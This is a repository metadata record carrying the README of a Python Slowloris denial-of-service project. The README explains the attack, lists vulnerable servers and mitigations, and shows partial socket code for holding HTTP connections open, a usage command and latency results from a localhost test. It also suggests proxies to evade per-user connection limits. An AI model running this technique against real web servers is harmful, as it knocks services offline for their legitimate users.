{"id":16553002,"url":"https://github.com/stangirard/slowloris-ddos-attack","last_synced_at":"2025-10-17T09:57:00.744Z","repository":{"id":50176169,"uuid":"242602662","full_name":"StanGirard/SlowLoris-DDOS-Attack","owner":"StanGirard","description":"A DDOS attack using the SlowLoris Method","archived":false,"fork":false,"pushed_at":"2022-12-08T06:18:57.000Z","size":28,"stargazers_count":16,"open_issues_count":2,"forks_count":2,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-06-20T00:07:43.023Z","etag":null,"topics":["attack","ddos","ddos-attacks","ddos-script","ddos-tool","python3","slowloris","slowloris-attack"],"latest_commit_sha":null,"homepage":"https://primates.dev/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/StanGirard.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-02-23T22:40:21.000Z","updated_at":"2025-06-09T21:31:12.000Z","dependencies_parsed_at":"2023-01-24T18:18:12.292Z","dependency_job_id":null,"html_url":"https://github.com/StanGirard/SlowLoris-DDOS-Attack","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/StanGirard/SlowLoris-DDOS-Attack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/StanGirard%2FSlowLoris-DDOS-Attack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/StanGirard%2FSlowLoris-DDOS-Attack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/StanGirard%2FSlowLoris-DDOS-Attack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/StanGirard%2FSlowLoris-DDOS-Attack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/StanGirard","download_url":"https://codeload.github.com/StanGirard/SlowLoris-DDOS-Attack/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/StanGirard%2FSlowLoris-DDOS-Attack/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":279322027,"owners_count":26148083,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-17T02:00:07.504Z","response_time":56,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["attack","ddos","ddos-attacks","ddos-script","ddos-tool","python3","slowloris","slowloris-attack"],"created_at":"2024-10-11T19:46:45.120Z","updated_at":"2025-10-17T09:57:00.686Z","avatar_url":"https://github.com/StanGirard.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Slow Loris Attack\nThe Slowloris attack allows a user to DDOS a server using only one machine. It tries to keep as many connections open with the target web server as possible and tries to keep them open as long as possible. As soon as Slowloris has opened a connection, it will keep it open by sending incomplete requests that it will slowly complete as it goes along but will never finish them. Affected servers will see their maximum number of connections reached and may refuse new user connections.\n\nThe servers mostly affected by the Slowloris attack are:\n\n- Apache 1.x and 2.x\n- dhttpd\n- Flask\nThere are modules for Apache that reduce the chance of a Slowloris attack such as:\n\n- mod_limitipconn\n- mod_qos, mod_evasive\n- mod security\n- mod_noloris\n- mod_antiloris\n\nThere are other methods to protect yourself, such as installing a:\n\n- reverse proxy\n- firewall\n- load balancer\n- content switches\nIf none of these solutions are available, it is always possible to place your web server behind an Nginx or lighthttpd.\n\n## How it works\nIt is necessary to install some dependencies. The commands to be executed to have an execution environment are the following:\n\n```Python\nvirtualenv env\nsource env/bin/activate\npip install -r requirements.txt\n```\nThen it is possible to choose some options:\n\n- a: Host to perform an attack on, default localhost\n- p: Port of the server, default = 80\n- s: Max socket to use\n- d: Debug mode\n\nFirst of all, it is necessary to retrieve the type of server you want to attack. For example, an apache 1.x/2.x server will allow an optimal attack.\n\nOn the other hand, attacking a WebServer running with the NodeJS framework from version 8 is useless.\n\nTo retrieve the type of server, we send a get request:\n```Python\nsock.send(\"GET / HTTP/1.1\\r\\n\\n\".encode(\"ascii\"))\n```\nThen we analyze the answer.\n\n```Python\nHTTP/1.1 400 Bad Request Date: Wed, 10 Jul 2019 16:18:53 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 301 Connection: close Content-Type: text/html; charset=iso-8859-1\n```\n\nFor the initialization of the sockets three requests are sent:\n\n```Python\ns.send(\"GET /?{} HTTP/1.1\\r\\n\".format(random.randint(0, 2000).encode(\"utf-8\"))\ns.send(\"User-Agent: {}\\r\\n\".format(ua.USER_AGENT[random.randin(0,29)]).encode(\"utf-8\"))\ns.send(\"{}\\r\\n\".format(\"Accept-language: en-US,en,q=0.5\".encode(\"utf-8\"))\n```\nThe first one initiates the connection\nThe second one sends the user agent used randomly chosen from the user agent pool.\nThe third one says which languages are accepted.\nOn initialization, the Slowloris will try to initiate as many connections as requested.\n\nIt will then keep them alive by completing them every 15 seconds with:\n\n```Python\ns.send(\"X-a: {}\\r\\n\".format(random.randint(1, 5000)).encode(\"utf-8\"))\n```\nIt will then try to open connections again until he reaches the limit we have set.\n```\nfor _ in range(self.target_info.sockets_number - len(self.sockets_list)):\n    try:\n        s = self.init_socks()\n        if s:\n            self.sockets_list.append(s)\n```\nThen the Slowloris will calculate the latency by requesting a separate thread.\n\n```Python\nresponse = requests.get(self.url).elapsed.total_seconds()\n```\nThe request makes a get on the host entered by the user and retrieves the time between sending and answering the request.\n\n## Results\nThe results below were performed on an Apache server with the initial configuration.\n\nThe program ran with the following command:\n\n`python src/main.py -a 127.0.0.1 -s 1000`\nAt first, the console shows us that we are on an Apache server, which is perfect for our attack.\n\n`[127.0.0.1] server running with Apache, best configuration for this attack`\nIn the second step, the initial latency is displayed:\n\n`[Latency] -- 0.002142`\n\nIt is therefore noticeable that the latency time is relatively low.\n\nThen we initialize the maximum socket.\n\n`279 connections 1000 initialized`\n\nWe notice here that we managed to initialize only 279 sockets out of 1000 planned. We now try to keep them open as long as possible.\n\nAfter 15 seconds, we try to create new connections to reach 1000 open connections.\n\nAfter 5 minutes, you can see that we have 408 open sockets.\n\n`408 connections 1000 initialized`\n\nThere is also a 15-second latency proof that denial of service works.\n\n`[Latency] -- 15.80608`\nAfter 10 minutes, the program is stopped so that you can see an average latency of 14.7 seconds.\n\n**Average latency = 14.7025671999999999999**\n\n\nWhen you try to launch another Slowloris on the same server when there is already a Slowloris running, it won't succeed because the number of open connections is already maxed out.\n\n```Bash\n(env) ➜ slow attack git:(master) ✗ python src/main.py -a 127.0.0.1\n19:30:51 - Slow Loris Attack Started\n19:30:54 - No Webserver detected, please verify your target address\n```\n## Difficulties\nThe main challenge was hardware, trying the attack on a remote server. The internet box \"banned\" me. It was impossible to access any website outside, impossible to use a DNS.\n\n\nThe second difficulty was to understand that the nodes' servers were not affected. The program seemed to work, but no slowdowns observed.\n\n## Room for Improvement\nThere is much room for improvement:\n\n- Automatic detection of the server and optimization of the parameters.\n- Automatic detection of server timeout for requests.\n- Detection of the maximum number of server connections to be able to choose the level of DDoS you want (a little, a lot, medium).\n- Use of proxies to allow more connections when there is a limited number of connections per user.\n\nThe Slowloris attack is exciting if the webserver is vulnerable to this attack because it allows a single computer to easily DDoS a server. However, it is easy to protect yourself against these attacks by implementing a few rules: a limited number of sockets per user, firewall, reverse proxy, etc..\n\nThanks to Quentin Derosin for the help on this project.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fstangirard%2Fslowloris-ddos-attack","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fstangirard%2Fslowloris-ddos-attack","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fstangirard%2Fslowloris-ddos-attack/lists"}